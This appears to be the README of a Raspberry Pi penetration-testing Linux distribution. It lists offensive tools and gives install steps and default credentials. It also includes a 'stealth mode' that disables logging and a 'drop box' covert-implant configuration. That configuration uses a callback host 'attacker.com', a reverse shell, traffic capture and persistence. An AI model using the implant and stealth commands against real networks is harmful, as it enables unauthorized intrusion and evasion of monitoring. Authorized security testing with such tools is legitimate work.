Security-focused Linux distribution optimized for Raspberry Pi
Portable penetration testing • IoT security • Embedded hacking • Field operations
Features • Download • Installation • Tools • Documentation
NullSec Linux Pi Edition is a specialized security distribution designed for Raspberry Pi hardware. It transforms your Pi into a powerful, portable penetration testing platform with optimized ARM tools, GPIO security utilities, and field-ready capabilities.
| Feature | Description |
|---|---|
| 🔧 ARM-Optimized Tools | 80+ security tools compiled for ARM64/ARMv7 |
| 📡 WiFi Attacks | Monitor mode drivers, aircrack-ng suite, WiFi Pineapple integration |
| 🔌 GPIO Security | Hardware hacking tools, JTAG/SWD debugging, signal analysis |
| 🎭 Stealth Mode | MAC spoofing, traffic obfuscation, covert channels |
| 📱 Mobile Integration | Android/iOS testing, Bluetooth attacks, NFC tools |
| 🔋 Power Optimized | Battery-friendly profiles, headless operation |
| 🖥️ Multiple Modes | Desktop, headless server, kiosk, drop box |
| Device | Status | Notes |
|---|---|---|
| Raspberry Pi 5 | ✅ Full Support | Recommended |
| Raspberry Pi 4B | ✅ Full Support | 4GB+ RAM recommended |
| Raspberry Pi 400 | ✅ Full Support | Built-in keyboard |
| Raspberry Pi 3B+ | Reduced toolset | |
| Raspberry Pi Zero 2W | Headless only |
Complete security toolkit with GUI, all tools, and development environment.
Headless operation with essential tools for field deployment.
Minimal footprint for covert network implants with auto-callback.
🌐 Network Security (25+ tools)
- Nmap, Masscan, Netcat
- Aircrack-ng suite
- Bettercap, Responder
- Wireshark (GUI), tshark
- WiFite2, Wifiphisher
- Kismet, hostapd-wpe
🔓 Exploitation (20+ tools)
- Metasploit Framework
- SQLMap, Commix
- Hydra, Medusa
- CrackMapExec
- Impacket suite
- Covenant (C2)
🔌 Hardware Hacking (15+ tools)
- OpenOCD (JTAG/SWD)
- flashrom
- SigRok/PulseView
- can-utils (CAN bus)
- I2C/SPI tools
- GPIO manipulation
📻 RF & Wireless (15+ tools)
- GNU Radio
- RTL-SDR tools
- HackRF utilities
- Bluetooth tools (Ubertooth)
- NFC tools (libnfc)
- LoRa analysis
# Download image
wget https://github.com/bad-antics/nullsec-linux-pi/releases/latest/download/nullsec-pi-full.img.xz
# Flash (Linux/macOS)
xzcat nullsec-pi-full.img.xz | sudo dd of=/dev/sdX bs=4M status=progress
# Or use Raspberry Pi Imager with custom image# Default credentials
Username: nullsec
Password: nullsec
# Change password immediately
passwd
# Update tools
sudo nullsec-update# Enable full stealth mode
sudo nullsec-stealth enable
# Includes:
# - MAC address randomization
# - Hostname spoofing
# - Traffic obfuscation
# - Logging disabled
# - Memory-only operation
# Disable stealth
sudo nullsec-stealth disableDeploy as a covert network implant:
# Configure callback
sudo nullsec-dropbox config \
--callback-host attacker.com \
--callback-port 443 \
--interval 300 \
--protocol https
# Enable drop box mode
sudo nullsec-dropbox enable
# Device will:
# - Auto-connect to any open WiFi
# - Establish reverse shell
# - Capture network traffic
# - Persist across reboots# JTAG scanning
sudo nullsec-jtag scan
# SWD debugging
sudo nullsec-swd connect --target stm32
# I2C enumeration
sudo nullsec-i2c scan
# SPI flash dump
sudo nullsec-spi dump --output firmware.bin| Edition | Storage | RAM | Network |
|---|---|---|---|
| Full | 16GB+ | 4GB+ | WiFi + Ethernet |
| Lite | 8GB+ | 2GB+ | WiFi |
| Drop Box | 4GB+ | 1GB+ | WiFi |
- NullSec Linux - Main distribution
- NullSec Flipper Suite - Flipper Zero tools
- NullSec Pineapple Suite - WiFi Pineapple payloads
bad-antics • For authorized security testing only